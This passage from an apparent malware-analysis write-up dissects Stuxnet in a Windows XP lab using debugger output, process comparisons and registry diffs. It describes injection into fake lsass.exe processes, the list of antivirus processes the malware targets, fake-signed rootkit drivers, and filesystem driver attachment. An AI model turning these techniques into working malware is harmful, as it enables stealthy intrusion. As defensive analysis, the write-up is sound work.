hook regarding nt!NtClose and a jump. Classic rootkit behavior. Let's go further and dump the IAT by loading notepad.exe into OlyDbg and viewing executable modules: Address Section Type ( Name Comment 0100102C .text Import ( GDI32.AbortDoc 0100131C .text Import msvcrt._acmdln 0100132C .text Import msvcrt._adjust_fdiv 01001300 .text Import ( msvcrt._cexit 01001204 .text Import ( USER32.CharLowerW 01001244 .text Import ( USER32.CharNextW 010011C0 .text Import ( USER32.CharUpperW 01001248 .text Import ( USER32.CheckMenuItem 01001230 .text Import ( USER32.ChildWindowFromPoint 010012D0 .text Import ( comdlg32.ChooseFontW 0100124C .text Import ( USER32.CloseClipboard 010010F8 .text Import ( KERNEL32.CloseHandle 010012B8 .text Import WINSPOOL.ClosePrinter 010012E0 .text Import ( comdlg32.CommDlgExtendedError 010010EC .text Import ( KERNEL32.CompareStringW 0100133C .text Import ( msvcrt._controlfp 01001040 .text Import ( GDI32.CreateDCW 01001214 .text Import ( USER32.CreateDialogParamW 010010B4 .text Import ( KERNEL32.CreateFileMappingW 01001104 .text Import ( KERNEL32.CreateFileW 01001064 .text Import ( GDI32.CreateFontIndirectW 01001020 .text Import ( COMCTL32.CreateStatusWindowW 010011E0 .text Import ( USER32.CreateWindowExW 010012F4 .text Import ( msvcrt._c_exit 010011A4 .text Import ( USER32.DefWindowProcW 01001034 .text Import ( GDI32.DeleteDC 01001158 .text Import ( KERNEL32.DeleteFileW 01001068 .text Import ( GDI32.DeleteObject 010011A8 .text Import ( USER32.DestroyWindow 01001198 .text Import ( USER32.DialogBoxParamW 01001294 .text Import ( USER32.DispatchMessageW 0100117C .text Import ( SHELL32.DragAcceptFiles 01001174 .text Import ( SHELL32.DragFinish 01001178 .text Import ( SHELL32.DragQueryFileW 01001210 .text Import ( USER32.DrawTextExW 0100125C .text Import ( USER32.EnableMenuItem 0100120C .text Import ( USER32.EnableWindow 01001288 .text Import ( USER32.EndDialog 01001030 .text Import ( GDI32.EndDoc 01001028 .text Import ( GDI32.EndPage 01001054 .text Import ( GDI32.EnumFontsW 01001308 .text Import ( msvcrt._except_handler3 010012F0 .text Import ( msvcrt._exit 01001318 .text Import ( msvcrt.exit 0100111C .text Import ( KERNEL32.FindClose 01001120 .text Import ( KERNEL32.FindFirstFileW 010012C8 .text Import ( comdlg32.FindTextW 010010F4 .text Import KERNEL32.FoldStringW 0100114C .text Import ( KERNEL32.FormatMessageW 0100115C .text Import ( KERNEL32.GetACP 01001188 .text Import ( USER32.GetClientRect 01001114 .text Import ( KERNEL32.GetCommandLineW 010010C0 .text Import ( KERNEL32.GetCurrentProcess 0100110C .text Import ( KERNEL32.GetCurrentProcessId 0100108C .text Import ( KERNEL32.GetCurrentThreadId 01001238 .text Import ( USER32.GetCursorPos 010010A0 .text Import ( KERNEL32.GetDateFormatW 01001194 .text Import ( USER32.GetDC 010011E4 .text Import ( USER32.GetDesktopWindow 01001060 .text Import ( GDI32.GetDeviceCaps 0100122C .text Import ( USER32.GetDlgCtrlID 01001274 .text Import ( USER32.GetDlgItem 01001284 .text Import ( USER32.GetDlgItemTextW 01001124 .text Import ( KERNEL32.GetFileAttributesW 010010B0 .text Import ( KERNEL32.GetFileInformationByHandle 010012D4 .text Import ( comdlg32.GetFileTitleW 010011E8 .text Import ( USER32.GetFocus 010011B4 .text Import ( USER32.GetForegroundWindow 010011A0 .text Import ( USER32.GetKeyboardLayout 01001138 .text Import ( KERNEL32.GetLastError 010010D8 .text Import ( KERNEL32.GetLocaleInfoW 01001098 .text Import ( KERNEL32.GetLocalTime 01001320 .text Import msvcrt.__getmainargs 01001264 .text Import ( USER32.GetMenu 01001258 .text Import ( USER32.GetMenuState 010012A8 .text Import ( USER32.GetMessageW 010010CC .text Import ( KERNEL32.GetModuleHandleA 0100105C .text Import ( GDI32.GetObjectW 010012D8 .text Import ( comdlg32.GetOpenFileNameW 0100128C .text Import ( USER32.GetParent 010012B4 .text Import WINSPOOL.GetPrinterDriverW 01001110 .text Import ( KERNEL32.GetProcAddress 010012E4 .text Import ( comdlg32.GetSaveFileNameW 010010D0 .text Import ( KERNEL32.GetStartupInfoA 01001058 .text Import ( GDI32.GetStockObject 01001260 .text Import ( USER32.GetSubMenu 010011CC .text Import ( USER32.GetSystemMenu 0100121C .text Import ( USER32.GetSystemMetrics 010010B8 .text Import ( KERNEL32.GetSystemTimeAsFileTime 0100103C .text Import ( GDI32.GetTextExtentPoint32W 01001048 .text Import ( GDI32.GetTextFaceW 0100106C .text Import ( GDI32.GetTextMetricsW 01001090 .text Import ( KERNEL32.GetTickCount 010010A4 .text Import KERNEL32.GetTimeFormatW 0100109C .text Import ( KERNEL32.GetUserDefaultLCID 01001150 .text Import KERNEL32.GetUserDefaultUILanguage 01001270 .text Import ( USER32.GetWindowLongW 010011BC .text Import ( USER32.GetWindowPlacement 01001218 .text Import ( USER32.GetWindowTextW 010010D4 .text Import ( KERNEL32.GlobalFree 010010A8 .text Import ( KERNEL32.GlobalLock 010010AC .text Import ( KERNEL32.GlobalUnlock 01001324 .text Import msvcrt._initterm 01001224 .text Import ( USER32.InvalidateRect 01001250 .text Import ( USER32.IsClipboardFormatAvailable 010012A0 .text Import ( USER32.IsDialogMessageW 010011B8 .text Import ( USER32.IsIconic 0100100C .text Import ADVAPI32.IsTextUnicode 01001304 .text Import ( msvcrt.iswctype 010011C8 .text Import ( USER32.LoadAcceleratorsW 010011D8 .text Import ( USER32.LoadCursorW 010011EC .text Import ( USER32.LoadIconW 010011D4 .text Import ( USER32.LoadImageW 010010C8 .text Import ( KERNEL32.LoadLibraryA 010011C4 .text Import ( USER32.LoadStringW 010010E0 .text Import ( KERNEL32.LocalAlloc 010010DC .text Import ( KERNEL32.LocalFree 010010F0 .text Import ( KERNEL32.LocalLock 01001148 .text Import ( KERNEL32.LocalReAlloc 01001134 .text Import ( KERNEL32.LocalSize 010012FC .text Import ( msvcrt.localtime 010010E8 .text Import ( KERNEL32.LocalUnlock 01001074 .text Import ( GDI32.LPtoDP 01001118 .text Import ( KERNEL32.lstrcatW 01001108 .text Import ( KERNEL32.lstrcmpiW 01001128 .text Import ( KERNEL32.lstrcmpW 01001130 .text Import ( KERNEL32.lstrcpynW 010010FC .text Import ( KERNEL32.lstrcpyW 010010E4 .text Import ( KERNEL32.lstrlenW 01001168 .text Import ( KERNEL32.MapViewOfFile 010011AC .text Import ( USER32.MessageBeep 01001268 .text Import ( USER32.MessageBoxW 0100739D .text Export <ModuleEntryPoint> 01001220 .text Import ( USER32.MoveWindow 0100112C .text Import ( KERNEL32.MulDiv 01001164 .text Import ( KERNEL32.MultiByteToWideChar 01001254 .text Import ( USER32.OpenClipboard 010012BC .text Import WINSPOOL.OpenPrinterW 010012C4 .text Import comdlg32.PageSetupDlgW 01001208 .text Import ( USER32.PeekMessageW 010012A4 .text Import ( USER32.PostMessageW 010011F4 .text Import ( USER32.PostQuitMessage 010012CC .text Import comdlg32.PrintDlgExW 01001330 .text Import msvcrt.__p__commode 01001334 .text Import msvcrt.__p__fmode 01001094 .text Import ( KERNEL32.QueryPerformanceCounter 01001100 .text Import ( KERNEL32.ReadFile 01001004 .text Import ( ADVAPI32.RegCloseKey 01001008 .text Import ( ADVAPI32.RegCreateKeyW 010011D0 .text Import ( USER32.RegisterClassExW 010011F8 .text Import ( USER32.RegisterWindowMessageW 01001014 .text Import ( ADVAPI32.RegOpenKeyExA 01001010 .text Import ( ADVAPI32.RegQueryValueExA 01001000 .text Import ( ADVAPI32.RegQueryValueExW 01001018 .text Import ( ADVAPI32.RegSetValueExW 01001190 .text Import ( USER32.ReleaseDC 010012DC .text Import ( comdlg32.ReplaceTextW 01001234 .text Import ( USER32.ScreenToClient 01001084 .text Import ( GDI32.SelectObject 0100123C .text Import ( USER32.SendDlgItemMessageW 01001240 .text Import ( USER32.SendMessageW 01001044 .text Import ( GDI32.SetAbortProc 0100119C .text Import ( USER32.SetActiveWindow 01001070 .text Import ( GDI32.SetBkMode 0100118C .text Import ( USER32.SetCursor 0100127C .text Import ( USER32.SetDlgItemTextW 01001154 .text Import ( KERNEL32.SetEndOfFile 01001278 .text Import ( USER32.SetFocus 01001140 .text Import ( KERNEL32.SetLastError 01001080 .text Import ( GDI32.SetMapMode 01001200 .text Import ( USER32.SetScrollPos 010010C4 .text Import ( KERNEL32.SetUnhandledExceptionFilter 01001328 .text Import msvcrt.__setusermatherr 0100107C .text Import ( GDI32.SetViewportExtEx 01001078 .text Import ( GDI32.SetWindowExtEx 0100126C .text Import ( USER32.SetWindowLongW 010011DC .text Import ( USER32.SetWindowPlacement 010011F0 .text Import ( USER32.SetWindowTextW 010012AC .text Import ( USER32.SetWinEventHook 01001338 .text Import msvcrt.__set_app_type 01001180 .text Import ( SHELL32.ShellAboutW 010011B0 .text Import ( USER32.ShowWindow 01001314 .text Import ( msvcrt._snwprintf 01001050 .text Import ( GDI32.StartDocW 01001038 .text Import ( GDI32.StartPage 010010BC .text Import ( KERNEL32.TerminateProcess 0100104C .text Import ( GDI32.TextOutW 010012F8 .text Import ( msvcrt.time 0100129C .text Import ( USER32.TranslateAcceleratorW 01001298 .text Import ( USER32.TranslateMessage 0100116C .text Import ( KERNEL32.UnhandledExceptionFilter 01001290 .text Import ( USER32.UnhookWinEvent 01001160 .text Import ( KERNEL32.UnmapViewOfFile 010011FC .text Import ( USER32.UpdateWindow 01001310 .text Import ( msvcrt.wcsncmp 01001340 .text Import ( msvcrt.wcsncpy 01001144 .text Import ( KERNEL32.WideCharToMultiByte 01001228 .text Import ( USER32.WinHelpW 0100113C .text Import ( KERNEL32.WriteFile 01001280 .text Import ( USER32.wsprintfW 0100130C .text Import ( msvcrt._wtol 010012EC .text Import msvcrt._XcptFilter The Import Address Table (IAT) is essentially just a table of jumps. It's used primarily as a lookup table when an application is calling a function in a different module. Compiled programs cannot know the memory locations of the libraries they depend on, therefore an indirect jump (jmp) is required whenever an API call is made. In the above code we can see jumps to functions such as USER32.GetKeyboardLayout, which is a wrapper for the NtUserLoadKeyboardLayoutEx win32k syscall. This is in regards to Stuxnet's keyboard layout vulnerability (CVE-2010-2743), which is one of four exploitative ways used to escalate privileges in order to reach ring 0. I would have loved to set a breakpoint on win32k!NtUserLoadKeyboardLayoutEx and trace the malware as it's extremely interesting, but setting breakpoints is not possible on an LKD session. I would have needed to break in to another physical machine (which I don't have), or set up a host > virtual COM port, which is a bit of a pain. I'll chalk it up to something to do on a rainy day. Call me lazy... I know. 3. Calls LoadLibraryW which is exported from kernel32.dll and passes it as a parameter for specially crafted file names such as: KERNEL32.DLL.ASLR.[HEX] or SHELL32.DLL.ASLR.[HEX]. Below we can see an example of a KERNEL32 variant: 4. Calls desired exported function. 5. Calls FreeLibrary function to free load library. New Process Inject The second method of injection is done through injecting a newly created process, as such: 1. Creates host process. 2. Replaces process image with the Stuxnet module to execute and with code that will load the module and call a specificed export passing parameters. There's a few different image names that can be chosen as the host process for the module: lsass.exe - MSFT system process in charge of enforcing the security policy. avp.exe - Kaspersky. mcshield.exe - McAfee VirusScan. avguard.exe - Avira Personal Edition. bdagent.exe - Bitdefender Switch Agent. UmxCfg.exe - eTrust Configuration Engine (HIPS). fsdfwd.exe - F-Secure. rtvscan.exe - Symantec Real time Virus Scan Service. ccSvchst.exe - Symantec Service Framework. ekrn.exe - ESET Service Process. tmproxy.exe - TrendMicro (PC-cillin in Australia and Virus Buster in Japan). Malware Execution and Infection First of all, to even successfully execute the malware you need to set your system time to before June 24th, 2012. This is due to the fact that Stuxnet hard-coded a poison pill to fully delete itself on June 24th, 2012. This was most likely done with the original idea in mind that Stuxnet wouldn't escape the nuclear facilities, which would allow time for Stuxnet to be reversed and ultimately defeated. This piece of malware wanted to stay inside nuclear facilities, target Siemens systems, cause large actual damage, spread to cause more damage, and then go ghost. Fortunately, it did happen to escape its intended environment (some even speculate deliberately) and was inevitably reversed and defeated long before its hard-coded deletion date. First of all, let's take a pre-infected look at the system with Autoruns + Process Explorer: (Ignore the file not found messages) Note the checked filter options > Verify code signatures + Hide Microsoft entries. Everything looks to be pretty normal, and nothing really out of the ordinary. We can see we have one instance of lsass.exe. Now let's turn things up a bit by executing the malware, and then comparing our results from pre-infection: We can see now within Autoruns we have two new services - MRxCls and MRxNet. These are Stuxnet's kernel-mode drivers which enable its rookit functionality. One big thing about malware that surfaces to the face of the public media (for whatever reason, we'll assume popularity/intention) is that journalists love to spin it and give awkward buzzwords - Undefeatable, The Most Sophisticated Malware, etc. Was Stuxnet an elborate piece of code? Yes, absolutely. Not only was knowledge needed regarding your typical rootkit/Win development, but heavy reverse engineering knowledge regarding Semens software was necessary as well. However, one of Stuxnet's biggest weak points was its immense lack of anti-debugging/reversing techniques. Among a slew of reasons such as zero VM obfuscation, you can literally use the default regedit to find the locations of both MRxCLS and MRxNet. For example: This had led Stuxnet to be something of a joke among some reverse engneers and analysts, even moreso if you believe that it was created by [insert government]. It's hard to imagine [insert government] wouldn't go to any lengths at all to hide its malware, but then again you never really know, right? : ) I'll continue the discussion regarding its kernel-mode functionality a little later as I'd like to swing back to user-mode real quick. I couldn't get Process Explorer to run after infection, as the VM would bugcheck. I have no idea why, and AFAIK Stuxnet doesn't employ anti-debugging against Sysinternals tools by any means, so it was likely a buggy sample. I digress, and used VMmap instead: We can see there's now three instances of lsass.exe, two of which are fake (newly created host processes). So first off, which is our legitmate lsass.exe? Well, 2/3 are the only ones above 1xxx regarding PID, so let's assume the only one not above 1xxx is legitimate: If sort by Protection regarding the tabs, we can see it's mostly Execute/Read which doesn't raise any red flags. Let's assume for the moment this is legitimate and take a look at another one: Uh oh, we can see two instances of memory that was chosen to share from this lsass.exe that has Write permissions in addition to Execute and Read. When a process has all three, it's a huge red flag for a fake/compromised process. In addition, note how the Size>Commited>Total Working Set, etc are equal. We can now at this point determine PID 648 is legitimate, and PID 1812 is fake. We can also at this point then assume that PID 1840 is fake as well: Yep! In this case, we have five instances of memory that was chosen to be shared with R/W/E permissions, in addition to ntdll with R/W/E permissions as well. Note the Size>Commited>Total Working Set, etc equals again as well. At this point we can fully determine 1812 and 1840 are our fake lsass.exe instances, and 1840 is in relation to the patching of ntdll. Let's further compare the three images based on their strings: (PID 648 - legit) (PID 1812 - fake #1) Note we have quite the changes here, with the important being "!This program cannot run in DOS mode.". This is the classic MZ exe format used for .exe files within DOS. We can note the ASCII string - 4D. Let's take a look at the bottom of the string list: (PID 1812 - fake #1) We can see a number of functions, such as InternetOpen. We can at this point determine the DLL was successfully injected into this image of lsass.exe. We can of course expect similar results with PID 1840: (PID 1840 - fake #2) We can also see abnormal termination of the NT Kernel, as well as a jmp: Another big red flag of a malformed image. Let's head back to discussing our kernel-mode drivers, MRxCls and MRxNet. As noted above, these two drivers aren't packed whatsoever with a protector nor packer, so inspecting them in-depth is painless: First off, both of these drivers were digitally signed (albeit fake... what a surprise) to fool the user into believing it was a legitmate driver signed off as such by VeriSign. For example: We can see MRxCls was fake-signed by VeriSign which claimed to be from Realtek. Realtek is obviously a legitimate company and releases lots of software/drivers for their products, such as audio, so this would fool a user if they ever questioned the legitimacy of the apparent MRxCls/Net drivers. Using SwishDbgExt, let's dump the list of objects: lkd> !ms_object Object: \ (Directory) |------|----------------------|--------------------|---------------------------------------------------------------------------| | Hdle | Object Type | Addr | Name | |------|----------------------|--------------------|---------------------------------------------------------------------------| | 0000 | Directory | 0xFFFFFFFFE100D748 | ArcName | | 0000 | Device | 0xFFFFFFFF821C75C0 | Ntfs | | 0000 | Port | 0xFFFFFFFFE15EABB8 | SeLsaCommandPort | | 0000 | Key | 0xFFFFFFFFE1010478 | \REGISTRY | | 0000 | Port | 0xFFFFFFFFE186B9E8 | ThemeApiPort | | 0000 | Port | 0xFFFFFFFFE1B05230 | XactSrvLpcPort | | 0000 | Directory | 0xFFFFFFFFE15AA4B8 | NLS | | 0000 | SymbolicLink | 0xFFFFFFFFE1008748 | DosDevices | | 0000 | Port | 0xFFFFFFFFE13D4B68 | SeRmCommandPort | | 0000 | Port | 0xFFFFFFFFE173BA00 | LsaAuthenticationPort | | 0000 | Device | 0xFFFFFFFF82063A90 | Dfs | | 0000 | Event | 0xFFFFFFFF821EF5C0 | | | 0000 | Directory | 0xFFFFFFFFE100E838 | Driver Notice the strange 'Driver' object with a 'Directory' type. Let's take a look: lkd> !ms_object 0xFFFFFFFFE100E838 Object: Driver (Directory) |------|----------------------|--------------------|---------------------------------------------------------------------------| | Hdle | Object Type | Addr | Name | |------|----------------------|--------------------|---------------------------------------------------------------------------| | 0000 | Driver | 0xFFFFFFFF8231ECC0 | \Driver\Beep | | 0000 | Driver | 0xFFFFFFFF821C72C0 | \Driver\NDIS | | 0000 | Driver | 0xFFFFFFFF821D39C0 | \Driver\KSecDD | | 0000 | Driver | 0xFFFFFFFF82198F38 | \Driver\Mouclass | | 0000 | Driver | 0xFFFFFFFF82245410 | \Driver\Raspti | | 0000 | Driver | 0xFFFFFFFF81F18768 | \Driver\es1371 | ... | | 0000 | Driver | 0xFFFFFFFF81EA2880 | \Driver\MRxCls | | 0000 | Driver | 0xFFFFFFFF821DE4A0 | \Driver\PCnet | | 0000 | Driver | 0xFFFFFFFF81F0FAE8 | \Driver\MRxNet Let's dump the driver object information for MRxNet: lkd> !drvobj 81f0fae8 Driver object (81f0fae8) is for: \Driver\MRxNet Driver Extension List: (id , addr) Device Object list: 820ee288 81f10020 81ebac80 82136298 82302298 82339be0 821bb500 821996c0 821bc238 8224a9d0 We can see MRxNet has a lot of device objects, so let's check one: lkd> !devobj 81ebac80 Device object (81ebac80) is for: \Driver\MRxNet DriverObject 81f0fae8 Current Irp 00000000 RefCount 0 Type 00000003 Flags 00000080 DevExt 81ebad38 DevObjExt 81ebad40 ExtensionFlags (0000000000) AttachedTo (Lower) 821d4450 \FileSystem\Cdfs Stuxnet creates new device objects and attaches to the device chain for each device object. As we can see, Stuxnet attached to cdfs.sys, which is part of the filesystem, specifically the CD-ROM filesystem driver. Other filesystem drivers it attaches to are: ntfs.sys, and fastfat.sys. After attaching, Stuxnet manages the driver object, which in turn provides Stuxnet with the ability to succesfully intercept IRP requests. Other than checking regedit, we can also confirm the existence of the MRxCls service within the registry using the !dreg command, which displays formatted registry key information. Before we do this however, we need to load ntsdexts.dll, or we'll get the following: lkd> !dreg System\CurrentControlSet\Services No export dreg found This is due to the fact that ntsdexts.dll isn't of course loaded in the extension DLL chain list: lkd> .chain Extension DLL search Path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem Extension DLL chain: dbghelp: image 6.12.0002.633, API 6.1.6, built Mon Feb 01 15:08:26 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll] ext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:31 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll] exts: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:24 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll] kext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:22 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\kext.dll] kdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:19 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\kdexts.dll] After loading it however with .load ntsdexts, we can then see it's in the list: lkd> .chain Extension DLL search Path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP;C:\Program Files\Debugging Tools for Windows (x86)\winext;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\Program Files\Debugging Tools for Windows (x86)\pri;C:\Program Files\Debugging Tools for Windows (x86);C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem Extension DLL chain: ntsdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:08 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\ntsdexts.dll] dbghelp: image 6.12.0002.633, API 6.1.6, built Mon Feb 01 15:08:26 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll] ext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:31 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\ext.dll] exts: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:24 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\exts.dll] kext: image 6.12.0002.633, API 1.0.0, built Mon Feb 01 15:08:22 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\winext\kext.dll] kdexts: image 6.1.7650.0, API 1.0.0, built Mon Feb 01 15:08:19 2010 [path: C:\Program Files\Debugging Tools for Windows (x86)\WINXP\kdexts.dll] Let's now run !dreg again with our path to MRxCls: lkd> !dreg System\CurrentControlSet\Services\MRxCls Subkey: Enum There it is, and we can see its subkey is Enum. We can confirm that looking back at the screenshot of its registry location above from earlier. Here were the overall changes in the registry comparing pre-infection > post-infection: ---------------------------------- Keys deleted: 23 ---------------------------------- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control HKLM\SYSTEM\ControlSet001\Services\MRxCls HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum HKLM\SYSTEM\ControlSet001\Services\MRxNet HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Control HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXNET\0000\Control HKLM\SYSTEM\CurrentControlSet\Services\MRxCls HKLM\SYSTEM\CurrentControlSet\Services\MRxCls\Enum HKLM\SYSTEM\CurrentControlSet\Services\MRxNet HKLM\SYSTEM\CurrentControlSet\Services\MRxNet\Enum HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\0 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell ---------------------------------- Values deleted: 110 ---------------------------------- HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\NextInstance: 0x00000001 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Service: "MRxCls" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Legacy: 0x00000001 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\ConfigFlags: 0x00000000 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Class: "LegacyDriver" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\DeviceDesc: "MRXCLS" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control\*NewlyCreated*: 0x00000000 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXCLS\0000\Control\ActiveService: "MRxCls" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\NextInstance: 0x00000001 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Service: "MRxNet" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Legacy: 0x00000001 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\ConfigFlags: 0x00000000 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Class: "LegacyDriver" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\DeviceDesc: "MRXNET" HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control\*NewlyCreated*: 0x00000000 HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_MRXNET\0000\Control\ActiveService: "MRxNet" HKLM\SYSTEM\ControlSet001\Services\MRxCls\Description: "MRXCLS" HKLM\SYSTEM\ControlSet001\Services\MRxCls\DisplayName: "MRXCLS" HKLM\SYSTEM\ControlSet001\Services\MRxCls\ErrorControl: 0x00000000 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Group: "Network" HKLM\SYSTEM\ControlSet001\Services\MRxCls\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxcls.sys" HKLM\SYSTEM\ControlSet001\Services\MRxCls\Start: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Type: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Data: 8F 1F F7 6D 7D B1 C9 09 9D CC 24 7A C6 9F FB 23 90 BD 9D BF F1 D4 51 92 2A B4 1F 6A 2E A6 4F B3 CB 69 7C 0B 92 3B 1B C0 D7 75 17 A9 E3 33 48 DC AD F6 DA EA 2F 87 10 C4 21 81 A5 75 68 00 2E B1 C2 7B EB DD BB 72 47 DC 87 91 14 A5 F3 C4 32 B0 CC 93 38 36 6B 49 0A F2 6F 1F 1D A1 4A 15 05 80 4B 13 A8 AA 82 41 4B 89 DC 89 24 A2 ED 16 37 F3 42 A9 A0 6A 7F 82 CD 90 E5 3C 49 CC B2 97 CA CB 7B 64 C1 48 B2 4C F5 AE 54 42 74 0F 00 31 FD 80 E8 7E 0E 69 12 42 3A EC 0F 6F 03 B8 46 9C 68 97 AC 62 16 FB 1A 1B D9 33 6C E8 F9 93 C3 56 54 A1 89 7A 7B 77 CE BA 0D 95 A7 0F AB 5E 1C 3C 18 63 AE 3E 60 A6 81 BC FA 85 FB 37 A0 0A 57 F9 C9 D3 CF 6B 41 D9 6D CD 39 71 C5 11 83 F1 D9 F3 7D B7 91 F7 70 46 C2 24 F7 B9 0F 2D B2 60 72 1C 8F F9 98 16 34 52 4B 7D 5F 81 5F 35 FD 8B 3E 78 B1 0B 0A 90 5A D8 30 5A 56 90 9A C0 C1 0F EB 95 D5 2F B7 C5 8D 2B 3F 49 41 8B 86 B4 DB 71 67 69 E6 E8 69 77 29 77 18 82 11 8B D7 5D 26 E4 5A 5C 2C 46 C2 F0 02 28 D8 EA 4B 95 9C 3A 3C 12 DA C4 87 21 91 4F D0 6E FA C4 DD B7 C9 AF E2 AE FE 14 0F 53 C4 BA DD 31 1A 38 7B 37 C0 9E 83 FF 2C B2 4C 88 33 C1 89 E5 CA 68 31 2D 20 CE 50 64 7B 39 C7 FB B1 9F A9 0D 6C 2A 82 AE 7F 25 43 A7 A2 28 EB 27 73 C9 45 F9 FD 53 A8 F4 A7 FD B4 90 B2 28 D8 0C 5A A8 84 D0 7F ED 99 25 18 FE B8 4C 48 66 8D 59 40 F6 CC 30 A6 F4 04 E8 76 9C EA 0E F6 A4 4A CE D2 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\0: "Root\LEGACY_MRXCLS\0000" HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\Count: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\MRxCls\Enum\NextInstance: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Description: "MRXNET" HKLM\SYSTEM\ControlSet001\Services\MRxNet\DisplayName: "MRXNET" HKLM\SYSTEM\ControlSet001\Services\MRxNet\ErrorControl: 0x00000000 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Group: "Network" HKLM\SYSTEM\ControlSet001\Services\MRxNet\ImagePath: "\??\C:\WINDOWS\system32\Drivers\mrxnet.sys" HKLM\SYSTEM\ControlSet001\Services\MRxNet\Start: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Type: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\0: "Root\LEGACY_MRXNET\0000" HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\Count: 0x00000001 HKLM\SYSTEM\ControlSet001\Services\MRxNet\Enum\NextInstance: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\NextInstance: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Service: "MRxCls" HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\Legacy: 0x00000001 HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MRXCLS\0000\ConfigFlags: 0x00000000 